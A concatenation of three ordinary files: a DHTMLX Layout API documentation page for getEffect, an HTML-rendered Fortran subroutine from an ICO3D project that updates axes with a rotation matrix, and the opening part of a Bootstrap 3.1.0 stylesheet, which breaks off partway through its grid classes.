[[<a href="#" title="Backlinks">dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect</a>]]
</div>
<div class="logo">
<a href="/dhtmlx/docs/doku.php" name="dokuwiki__top" id="dokuwiki__top" accesskey="h" title="[H]">DHX documentation</a> </div>
<div class="clearer"></div>-->
</div>
<!-- <div class="bar" id="bar__top">
<div class="bar-left" id="bar__topleft">
<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> <form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form> </div>
<div class="bar-right" id="bar__topright">
<form class="button btn_recent" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="recent" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Recent changes" class="button" accesskey="r" title="Recent changes [R]" /></div></form> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form>
</div>
<div class="clearer"></div>
</div> -->
<!-- <div class="breadcrumbs">
<span class="bchead">Trace:</span> <span class="bcsep">»</span> <span class="curid"><a href="/dhtmlx/docs/doku.php?id=dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" class="breadcrumbs" title="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect">api_method_dhtmlxlayoutobject_geteffect</a></span> </div>
-->
</div>
<div class="page">
<!-- wikipage start -->
<p>
<div class='backlinks'><div class='backlink last_backlink'><img src="icons___file.gif" class="media" alt="" /><a href="../index.html" class="wikilink1" title="start">Index</a></div><div class='arrow'></div><div class='backlink last_backlink'><img src="icons___layout.gif" class="media" alt="" /><a href=index.html class="wikilink1" title="dhtmlxlayout:toc">dhtmlxlayout</a></div><div class='arrow'></div><div class='backlink'><a href="dhtmlxlayout___api_toc_alpha.html" class="wikilink1" title="dhtmlxlayout:api_toc_alpha">API Methods</a></div></div>
</p>
<h3><a name="geteffect_efname" id="geteffect_efname">getEffect(efName)</a></h3>
<div class="level3">
<p>
<em>Required library edition:</em> <img src="common___any_ed.gif" class="media" title="This method works with any edition of DHTMLX library" alt="This method works with any edition of DHTMLX library" /><br/>
<em>Required library file: dhtmlxlayout.js</em>
</p>
<p>
returns true if the effect is enabled
</p>
<ul>
<li class="level1"><div class="li"> efName - effect name</div>
</li>
</ul>
<pre class="code javascript"> <span class="kw2">var</span> isResizeEffect <span class="sy0">=</span> dhxLayout.<span class="me1">getEffect</span><span class="br0">(</span><span class="st0">"resize"</span><span class="br0">)</span>; <span class="co1">// return true/false</span></pre>
</div>
<div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="81-" /><input type="hidden" name="rev" value="1335526047" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Edit" class="button" title="getEffect(efName)" /></div></form></div>
<!-- wikipage stop -->
</div>
<div class="clearer"> </div>
<div class="stylefoot">
<div class="meta">
<div class="user">
</div>
<!-- <div class="doc">
dhtmlxlayout/api_method_dhtmlxlayoutobject_geteffect.txt · Last modified: 2012/04/27 15:27 (external edit) </div>
</div>-->
<!--<div class="bar" id="bar__bottom">-->
<!--<div class="bar-left" id="bar__bottomleft">-->
<!--<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form>-->
<!--<form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form>-->
<!--</div>-->
<!--<div class="bar-right" id="bar__bottomright">-->
<!---->
<!---->
<!---->
<!---->
<!---->
<!--<form class="button btn_index" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="index" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Index" class="button" accesskey="x" title="Index [X]" /></div></form>-->
<!--<a class="nolink" href="#dokuwiki__top"><input type="button" class="button" value="Back to top" onclick="window.scrollTo(0, 0)" title="Back to top" /></a> -->
<!--</div>-->
<!--<div class="clearer"></div>-->
<!--</div>-->
</div>
</div>
<div class="footerinc">
</div>
<div class="no"><img src="/dhtmlx/docs/lib/exe/indexer.php?id=dhtmlxlayout%3Aapi_method_dhtmlxlayoutobject_geteffect&1345730688" width="1" height="1" alt="" /></div>
<div class="footer">
<div class="footer-logo"></div>
<div class="copyright">Copyright © 1998-2011 DHTMLX LTD.<br />All rights reserved.</div>
<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxlayout:api_method_dhtmlxlayoutobject_geteffect" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> </div>
</body>
</html>
|
ICO3D/Understand_ICO/ICOunderstand_html/3389.html | CK08/ICO | <html><head><title>AxisUpdate.f90</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<link rel="stylesheet" type="text/css" href="sourcestyles.css" />
</head><body link="blue" vlink="blue">
<h3>File: /Users/diogocardoso/Desktop/ICO3D/ICO3D/AxisUpdate.f90</h3>
<SCRIPT>
defaultStatus = "File: /Users/diogocardoso/Desktop/ICO3D/ICO3D/AxisUpdate.f90";
top.document.title = "AxisUpdate.f90";
</SCRIPT>
<pre><span class="default"></span><a name="1"><font size=-1>1 </font></a><span class="default"></span><span class="comment">!----------------------------------------------------------------------------------------------</span>
<a name="2"><font size=-1>2 </font></a><span class="comment">!</span>
<a name="3"><font size=-1>3 </font></a><span class="comment">! Axis Update subroutine</span>
<a name="4"><font size=-1>4 </font></a><span class="comment">!</span>
<a name="5"><font size=-1>5 </font></a><span class="comment">! Input: raux - Axis Matrix</span>
<a name="6"><font size=-1>6 </font></a><span class="comment">! matR - Rotation Matrix</span>
<a name="7"><font size=-1>7 </font></a><span class="comment">!</span>
<a name="8"><font size=-1>8 </font></a><span class="comment">! Output: rconv - Updated axis</span>
<a name="9"><font size=-1>9 </font></a><span class="comment">!</span>
<a name="10"><font size=-1>10 </font></a><span class="comment">!----------------------------------------------------------------------------------------------</span>
<a name="11"><font size=-1>11 </font></a><span class="comment"></span><span class="keyword">subroutine <a href="dictionary_A.html#210">axisupdate</a></span><span class="default">(<a href="dictionary_R.html#3396">raux</a>,<a href="dictionary_M.html#3395">matr</a>,<a href="dictionary_R.html#3397">rconv</a>)</span>
<a name="12"><font size=-1>12 </font></a><span class="default"> </span><span class="keyword">implicit none</span>
<a name="13"><font size=-1>13 </font></a><span class="keyword"> </span>
<a name="14"><font size=-1>14 </font></a><span class="keyword"> real</span><span class="default">(</span><span class="number">8</span><span class="default">),</span><span class="keyword">dimension</span><span class="default">(</span><span class="number">3</span><span class="default">,</span><span class="number">3</span><span class="default">),</span><span class="keyword">intent</span><span class="default">(</span><span class="keyword">IN</span><span class="default">)::<a href="dictionary_R.html#3396">raux</a>,<a href="dictionary_M.html#3395">matr</a></span>
<a name="15"><font size=-1>15 </font></a><span class="default"> </span><span class="keyword">real</span><span class="default">(</span><span class="number">8</span><span class="default">),</span><span class="keyword">dimension</span><span class="default">(</span><span class="number">3</span><span class="default">,</span><span class="number">3</span><span class="default">),</span><span class="keyword">intent</span><span class="default">(</span><span class="keyword">OUT</span><span class="default">)::<a href="dictionary_R.html#3397">rconv</a></span>
<a name="16"><font size=-1>16 </font></a><span class="default"> </span><span class="keyword">integer</span><span class="default">(</span><span class="number">4</span><span class="default">)::<a href="dictionary_J.html#3394">j</a></span>
<a name="17"><font size=-1>17 </font></a><span class="default"> </span><span class="keyword">real</span><span class="default">(</span><span class="number">8</span><span class="default">),</span><span class="keyword">dimension</span><span class="default">(</span><span class="number">3</span><span class="default">,</span><span class="number">1</span><span class="default">)::<a href="dictionary_A.html#3390">aux31</a>,<a href="dictionary_A.html#3391">auxx</a>,<a href="dictionary_A.html#3392">auxy</a>,<a href="dictionary_A.html#3393">auxz</a></span>
<a name="18"><font size=-1>18 </font></a><span class="default"> </span>
<a name="19"><font size=-1>19 </font></a><span class="default"> </span><span class="keyword">do <a href="dictionary_J.html#3394">j</a></span><span class="default">=</span><span class="number">1</span><span class="default">,</span><span class="number">3</span>
<a name="20"><font size=-1>20 </font></a><span class="number"> <a href="dictionary_A.html#3390">aux31</a></span><span class="default">(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)=<a href="dictionary_R.html#3396">raux</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)</span>
<a name="21"><font size=-1>21 </font></a><span class="default"> </span><span class="keyword">end do</span>
<a name="22"><font size=-1>22 </font></a><span class="keyword"> </span>
<a name="23"><font size=-1>23 </font></a><span class="keyword"> <a href="dictionary_A.html#3391">auxx</a></span><span class="default">=<a href="dictionary_M.html#34">matmul</a>(<a href="dictionary_M.html#3395">matR</a>,<a href="dictionary_A.html#3390">aux31</a>)</span>
<a name="24"><font size=-1>24 </font></a><span class="default"> </span>
<a name="25"><font size=-1>25 </font></a><span class="default"> </span><span class="keyword">do <a href="dictionary_J.html#3394">j</a></span><span class="default">=</span><span class="number">1</span><span class="default">,</span><span class="number">3</span>
<a name="26"><font size=-1>26 </font></a><span class="number"> <a href="dictionary_A.html#3390">aux31</a></span><span class="default">(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)=<a href="dictionary_R.html#3396">raux</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">2</span><span class="default">)</span>
<a name="27"><font size=-1>27 </font></a><span class="default"> </span><span class="keyword">end do</span>
<a name="28"><font size=-1>28 </font></a><span class="keyword"> </span>
<a name="29"><font size=-1>29 </font></a><span class="keyword"> <a href="dictionary_A.html#3392">auxy</a></span><span class="default">=<a href="dictionary_M.html#34">matmul</a>(<a href="dictionary_M.html#3395">matR</a>,<a href="dictionary_A.html#3390">aux31</a>)</span>
<a name="30"><font size=-1>30 </font></a><span class="default"> </span>
<a name="31"><font size=-1>31 </font></a><span class="default"> </span><span class="keyword">call <a href="dictionary_C.html#52">cross</a></span><span class="default">(<a href="dictionary_A.html#3391">auxx</a>,<a href="dictionary_A.html#3392">auxy</a>,<a href="dictionary_A.html#3393">auxz</a>)</span>
<a name="32"><font size=-1>32 </font></a><span class="default"> </span>
<a name="33"><font size=-1>33 </font></a><span class="default"> </span><span class="keyword">do <a href="dictionary_J.html#3394">j</a></span><span class="default">=</span><span class="number">1</span><span class="default">,</span><span class="number">3</span>
<a name="34"><font size=-1>34 </font></a><span class="number"> <a href="dictionary_R.html#3397">rconv</a></span><span class="default">(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)=<a href="dictionary_A.html#3391">auxx</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)</span>
<a name="35"><font size=-1>35 </font></a><span class="default"> <a href="dictionary_R.html#3397">rconv</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">2</span><span class="default">)=<a href="dictionary_A.html#3392">auxy</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)</span>
<a name="36"><font size=-1>36 </font></a><span class="default"> <a href="dictionary_R.html#3397">rconv</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">3</span><span class="default">)=<a href="dictionary_A.html#3393">auxz</a>(<a href="dictionary_J.html#3394">j</a>,</span><span class="number">1</span><span class="default">)</span>
<a name="37"><font size=-1>37 </font></a><span class="default"> </span><span class="keyword">end do</span>
<a name="38"><font size=-1>38 </font></a><span class="keyword"></span>
<a name="39"><font size=-1>39 </font></a><span class="keyword"></span>
<a name="40"><font size=-1>40 </font></a><span class="keyword"> end subroutine <a href="dictionary_A.html#210">axisupdate</a></span>
<a name="41"><font size=-1>41 </font></a><span class="keyword"></span>
</pre></body></html>
|
core/themes/seven/flat/bootstrap/css/bootstrap.css | commty/Core7 | /*!
* Bootstrap v3.1.0 (http://getbootstrap.com)
* Copyright 2011-2014 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
/*! normalize.css v3.0.0 | MIT License | git.io/normalize */
html {
font-family: sans-serif;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
}
body {
margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
nav,
section,
summary {
display: block;
}
audio,
canvas,
progress,
video {
display: inline-block;
vertical-align: baseline;
}
audio:not([controls]) {
display: none;
height: 0;
}
[hidden],
template {
display: none;
}
a {
background: transparent;
}
a:active,
a:hover {
outline: 0;
}
abbr[title] {
border-bottom: 1px dotted;
}
b,
strong {
font-weight: bold;
}
dfn {
font-style: italic;
}
h1 {
margin: .67em 0;
font-size: 2em;
}
mark {
color: #000;
background: #ff0;
}
small {
font-size: 80%;
}
sub,
sup {
position: relative;
font-size: 75%;
line-height: 0;
vertical-align: baseline;
}
sup {
top: -.5em;
}
sub {
bottom: -.25em;
}
img {
border: 0;
}
svg:not(:root) {
overflow: hidden;
}
figure {
margin: 1em 40px;
}
hr {
height: 0;
-moz-box-sizing: content-box;
box-sizing: content-box;
}
pre {
overflow: auto;
}
code,
kbd,
pre,
samp {
font-family: monospace, monospace;
font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
margin: 0;
font: inherit;
color: inherit;
}
button {
overflow: visible;
}
button,
select {
text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
-webkit-appearance: button;
cursor: pointer;
}
button[disabled],
html input[disabled] {
cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
padding: 0;
border: 0;
}
input {
line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
box-sizing: border-box;
padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
height: auto;
}
input[type="search"] {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
-webkit-appearance: textfield;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
-webkit-appearance: none;
}
fieldset {
padding: .35em .625em .75em;
margin: 0 2px;
border: 1px solid #c0c0c0;
}
legend {
padding: 0;
border: 0;
}
textarea {
overflow: auto;
}
optgroup {
font-weight: bold;
}
table {
border-spacing: 0;
border-collapse: collapse;
}
td,
th {
padding: 0;
}
@media print {
* {
color: #000 !important;
text-shadow: none !important;
background: transparent !important;
box-shadow: none !important;
}
a,
a:visited {
text-decoration: underline;
}
a[href]:after {
content: " (" attr(href) ")";
}
abbr[title]:after {
content: " (" attr(title) ")";
}
a[href^="javascript:"]:after,
a[href^="#"]:after {
content: "";
}
pre,
blockquote {
border: 1px solid #999;
page-break-inside: avoid;
}
thead {
display: table-header-group;
}
tr,
img {
page-break-inside: avoid;
}
img {
max-width: 100% !important;
}
p,
h2,
h3 {
orphans: 3;
widows: 3;
}
h2,
h3 {
page-break-after: avoid;
}
select {
background: #fff !important;
}
.navbar {
display: none;
}
.table td,
.table th {
background-color: #fff !important;
}
.btn > .caret,
.dropup > .btn > .caret {
border-top-color: #000 !important;
}
.label {
border: 1px solid #000;
}
.table {
border-collapse: collapse !important;
}
.table-bordered th,
.table-bordered td {
border: 1px solid #ddd !important;
}
}
* {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
*:before,
*:after {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
html {
font-size: 62.5%;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 14px;
line-height: 1.428571429;
color: #333;
background-color: #fff;
}
input,
button,
select,
textarea {
font-family: inherit;
font-size: inherit;
line-height: inherit;
}
a {
color: #428bca;
text-decoration: none;
}
a:hover,
a:focus {
color: #2a6496;
text-decoration: underline;
}
a:focus {
outline: thin dotted;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
figure {
margin: 0;
}
img {
vertical-align: middle;
}
.img-responsive {
display: block;
max-width: 100%;
height: auto;
}
.img-rounded {
border-radius: 6px;
}
.img-thumbnail {
display: inline-block;
max-width: 100%;
height: auto;
padding: 4px;
line-height: 1.428571429;
background-color: #fff;
border: 1px solid #ddd;
border-radius: 4px;
-webkit-transition: all .2s ease-in-out;
transition: all .2s ease-in-out;
}
.img-circle {
border-radius: 50%;
}
hr {
margin-top: 20px;
margin-bottom: 20px;
border: 0;
border-top: 1px solid #eee;
}
.sr-only {
position: absolute;
width: 1px;
height: 1px;
padding: 0;
margin: -1px;
overflow: hidden;
clip: rect(0, 0, 0, 0);
border: 0;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
font-family: inherit;
font-weight: 500;
line-height: 1.1;
color: inherit;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small,
h1 .small,
h2 .small,
h3 .small,
h4 .small,
h5 .small,
h6 .small,
.h1 .small,
.h2 .small,
.h3 .small,
.h4 .small,
.h5 .small,
.h6 .small {
font-weight: normal;
line-height: 1;
color: #999;
}
h1,
.h1,
h2,
.h2,
h3,
.h3 {
margin-top: 20px;
margin-bottom: 10px;
}
h1 small,
.h1 small,
h2 small,
.h2 small,
h3 small,
.h3 small,
h1 .small,
.h1 .small,
h2 .small,
.h2 .small,
h3 .small,
.h3 .small {
font-size: 65%;
}
h4,
.h4,
h5,
.h5,
h6,
.h6 {
margin-top: 10px;
margin-bottom: 10px;
}
h4 small,
.h4 small,
h5 small,
.h5 small,
h6 small,
.h6 small,
h4 .small,
.h4 .small,
h5 .small,
.h5 .small,
h6 .small,
.h6 .small {
font-size: 75%;
}
h1,
.h1 {
font-size: 36px;
}
h2,
.h2 {
font-size: 30px;
}
h3,
.h3 {
font-size: 24px;
}
h4,
.h4 {
font-size: 18px;
}
h5,
.h5 {
font-size: 14px;
}
h6,
.h6 {
font-size: 12px;
}
p {
margin: 0 0 10px;
}
.lead {
margin-bottom: 20px;
font-size: 16px;
font-weight: 200;
line-height: 1.4;
}
@media (min-width: 768px) {
.lead {
font-size: 21px;
}
}
small,
.small {
font-size: 85%;
}
cite {
font-style: normal;
}
.text-left {
text-align: left;
}
.text-right {
text-align: right;
}
.text-center {
text-align: center;
}
.text-justify {
text-align: justify;
}
.text-muted {
color: #999;
}
.text-primary {
color: #428bca;
}
a.text-primary:hover {
color: #3071a9;
}
.text-success {
color: #3c763d;
}
a.text-success:hover {
color: #2b542c;
}
.text-info {
color: #31708f;
}
a.text-info:hover {
color: #245269;
}
.text-warning {
color: #8a6d3b;
}
a.text-warning:hover {
color: #66512c;
}
.text-danger {
color: #a94442;
}
a.text-danger:hover {
color: #843534;
}
.bg-primary {
color: #fff;
background-color: #428bca;
}
a.bg-primary:hover {
background-color: #3071a9;
}
.bg-success {
background-color: #dff0d8;
}
a.bg-success:hover {
background-color: #c1e2b3;
}
.bg-info {
background-color: #d9edf7;
}
a.bg-info:hover {
background-color: #afd9ee;
}
.bg-warning {
background-color: #fcf8e3;
}
a.bg-warning:hover {
background-color: #f7ecb5;
}
.bg-danger {
background-color: #f2dede;
}
a.bg-danger:hover {
background-color: #e4b9b9;
}
.page-header {
padding-bottom: 9px;
margin: 40px 0 20px;
border-bottom: 1px solid #eee;
}
ul,
ol {
margin-top: 0;
margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
margin-bottom: 0;
}
.list-unstyled {
padding-left: 0;
list-style: none;
}
.list-inline {
padding-left: 0;
list-style: none;
}
.list-inline > li {
display: inline-block;
padding-right: 5px;
padding-left: 5px;
}
.list-inline > li:first-child {
padding-left: 0;
}
dl {
margin-top: 0;
margin-bottom: 20px;
}
dt,
dd {
line-height: 1.428571429;
}
dt {
font-weight: bold;
}
dd {
margin-left: 0;
}
@media (min-width: 768px) {
.dl-horizontal dt {
float: left;
width: 160px;
overflow: hidden;
clear: left;
text-align: right;
text-overflow: ellipsis;
white-space: nowrap;
}
.dl-horizontal dd {
margin-left: 180px;
}
}
abbr[title],
abbr[data-original-title] {
cursor: help;
border-bottom: 1px dotted #999;
}
.initialism {
font-size: 90%;
text-transform: uppercase;
}
blockquote {
padding: 10px 20px;
margin: 0 0 20px;
font-size: 17.5px;
border-left: 5px solid #eee;
}
blockquote p:last-child,
blockquote ul:last-child,
blockquote ol:last-child {
margin-bottom: 0;
}
blockquote footer,
blockquote small,
blockquote .small {
display: block;
font-size: 80%;
line-height: 1.428571429;
color: #999;
}
blockquote footer:before,
blockquote small:before,
blockquote .small:before {
content: '\2014 \00A0';
}
.blockquote-reverse,
blockquote.pull-right {
padding-right: 15px;
padding-left: 0;
text-align: right;
border-right: 5px solid #eee;
border-left: 0;
}
.blockquote-reverse footer:before,
blockquote.pull-right footer:before,
.blockquote-reverse small:before,
blockquote.pull-right small:before,
.blockquote-reverse .small:before,
blockquote.pull-right .small:before {
content: '';
}
.blockquote-reverse footer:after,
blockquote.pull-right footer:after,
.blockquote-reverse small:after,
blockquote.pull-right small:after,
.blockquote-reverse .small:after,
blockquote.pull-right .small:after {
content: '\00A0 \2014';
}
blockquote:before,
blockquote:after {
content: "";
}
address {
margin-bottom: 20px;
font-style: normal;
line-height: 1.428571429;
}
code,
kbd,
pre,
samp {
font-family: Menlo, Monaco, Consolas, "Courier New", monospace;
}
code {
padding: 2px 4px;
font-size: 90%;
color: #c7254e;
white-space: nowrap;
background-color: #f9f2f4;
border-radius: 4px;
}
kbd {
padding: 2px 4px;
font-size: 90%;
color: #fff;
background-color: #333;
border-radius: 3px;
box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .25);
}
pre {
display: block;
padding: 9.5px;
margin: 0 0 10px;
font-size: 13px;
line-height: 1.428571429;
color: #333;
word-break: break-all;
word-wrap: break-word;
background-color: #f5f5f5;
border: 1px solid #ccc;
border-radius: 4px;
}
pre code {
padding: 0;
font-size: inherit;
color: inherit;
white-space: pre-wrap;
background-color: transparent;
border-radius: 0;
}
.pre-scrollable {
max-height: 340px;
overflow-y: scroll;
}
.container {
padding-right: 15px;
padding-left: 15px;
margin-right: auto;
margin-left: auto;
}
@media (min-width: 768px) {
.container {
width: 750px;
}
}
@media (min-width: 992px) {
.container {
width: 970px;
}
}
@media (min-width: 1200px) {
.container {
width: 1170px;
}
}
.container-fluid {
padding-right: 15px;
padding-left: 15px;
margin-right: auto;
margin-left: auto;
}
.row {
margin-right: -15px;
margin-left: -15px;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
position: relative;
min-height: 1px;
padding-right: 15px;
padding-left: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
float: left;
}
.col-xs-12 {
width: 100%;
}
.col-xs-11 {
width: 91.66666666666666%;
}
.col-xs-10 {
width: 83.33333333333334%;
}
.col-xs-9 {
width: 75%;
}
.col-xs-8 {
width: 66.66666666666666%;
}
.col-xs-7 {
width: 58.333333333333336%;
}
.col-xs-6 {
width: 50%;
}
.col-xs-5 {
width: 41.66666666666667%;
}
.col-xs-4 {
width: 33.33333333333333%;
}
.col-xs-3 {
width: 25%;
}
.col-xs-2 {
width: 16.666666666666664%;
}
.col-xs-1 {
width: 8.333333333333332%;
}
.col-xs-pull-12 {
right: 100%;
}
.col-xs-pull-11 {
right: 91.66666666666666%;
}
.col-xs-pull-10 {
right: 83.33333333333334%;
}
.col-xs-pull-9 {
right: 75%;
}
.col-xs-pull-8 {
right: 66.66666666666666%;
}
.col-xs-pull-7 {
right: 58.333333333333336%;
}
.col-xs-pull-6 {
right: 50%;
}
.col-xs-pull-5 {
right: 41.66666666666667%;
}
.col-xs-pull-4 {
right: 33.33333333333333%;
}
.col-xs-pull-3 {
right: 25%;
}
.col-xs-pull-2 {
right: 16.666666666666664%;
}
.col-xs-pull-1 {
right: 8.333333333333332%;
}
.col-xs-pull-0 {
right: 0;
}
.col-xs-push-12 {
left: 100%;
}
.col-xs-push-11 {
left: 91.66666666666666%;
}
.col-xs-push-10 {
left: 83.33333333333334%;
}
.col-xs-push-9 {
left: 75%;
}
.col-xs-push-8 {
left: 66.66666666666666%;
}
.col-xs-push-7 {
left: 58.333333333333336%;
}
.col-xs-push-6 {
left: 50%;
}
.col-xs-push-5 {
left: 41.66666666666667%;
}
.col-xs-push-4 {
left: 33.33333333333333%;
}
.col-xs-push-3 {
left: 25%;
}
.col-xs-push-2 {
left: 16.666666666666664%;
}
.col-xs-push-1 {
left: 8.333333333333332%;
}
.col-xs-push-0 {
left: 0;
}
.col-xs-offset-12 {
margin-left: 100%;
}
.col-xs-offset-11 {
margin-left: 91.66666666666666%;
}
.col-xs-offset-10 {
margin-left: 83.33333333333334%;
}
.col-xs-offset-9 {
margin-left: 75%;
}
.col-xs-offset-8 {
margin-left: 66.66666666666666%;
}
.col-xs-offset-7 {
margin-left: 58.333333333333336%;
}
.col-xs-offset-6 {
margin-left: 50%;
}
.col-xs-offset-5 {
margin-left: 41.66666666666667%;
}
.col-xs-offset-4 {
margin-left: 33.33333333333333%;
}
.col-xs-offset-3 {
margin-left: 25%;
}
.col-xs-offset-2 {
margin-left: 16.666666666666664%;
}
.col-xs-offset-1 {
margin-left: 8.333333333333332%;
}
.col-xs-offset-0 {
margin-left: 0;
}
@media (min-width: 768px) {
.col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
float: left;
}
.col-sm-12 {
width: 100%;
}
.col-sm-11 {
width: 91.66666666666666%;
}
.col-sm-10 {
width: 83.33333333333334%;
}
.col-sm-9 {
width: 75%;
}
.col-sm-8 {
width: 66.66666666666666%;
}
.col-sm-7 {
width: 58.333333333333336%;
}
.col-sm-6 {
width: 50%;
}
.col-sm-5 {
width: 41.66666666666667%;
}
.col-sm-4 {
width: 33.33333333333333%;
}
.col-sm-3 {
width: 25%;
}
.col-sm-2 {
width: 16.666666666666664%;
}
.col-sm-1 {
width: 8.333333333333332%;
}
.col-sm-pull-12 {
right: 100%;
}
.col-sm-pull-11 {
right: 91.66666666666666%;
}
.col-sm-pull-10 {
right: 83.33333333333334%;
}
.col-sm-pull-9 {
right: 75%;
}
.col-sm-pull-8 {
right: 66.66666666666666%;
}
.col-sm-pull-7 {
right: 58.333333333333336%;
}
.col-sm-pull-6 {
right: 50%;
}
.col-sm-pull-5 {
right: 41.66666666666667%;
}
.col-sm-pull-4 {
right: 33.33333333333333%;
}
.col-sm-pull-3 {
right: 25%;
}
.col-sm-pull-2 {
right: 16.666666666666664%;
}
.col-sm-pull-1 {
right: 8.333333333333332%;
}
.col-sm-pull-0 {
right: 0;
}
.col-sm-push-12 {
left: 100%;
}
.col-sm-push-11 {
left: 91.66666666666666%;
}
.col-sm-push-10 {
left: 83.33333333333334%;
}
.col-sm-push-9 {
left: 75%;
}
.col-sm-push-8 {
left: 66.66666666666666%;
}
.col-sm-push-7 {
left: 58.333333333333336%;
}
.col-sm-push-6 {
left: 50%;
}
.col-sm-push-5 {
left: 41.66666666666667%;
}
.col-sm-push-4 {
left: 33.33333333333333%;
}
.col-sm-push-3 {
left: 25%;
}
.col-sm-push-2 {
left: 16.666666666666664%;
}
.col-sm-push-1 {
left: 8.333333333333332%;
}
.col-sm-push-0 {
left: 0;
}
.col-sm-offset-12 {
margin-left: 100%;
}
.col-sm-offset-11 {
margin-left: 91.66666666666666%;
}
.col-sm-offset-10 {
margin-left: 83.33333333333334%;
}
.col-sm-offset-9 {
margin-left: 75%;
}
.col-sm-offset-8 {
margin-left: 66.66666666666666%;
}
.col-sm-offset-7 {
margin-left: 58.333333333333336%;
}
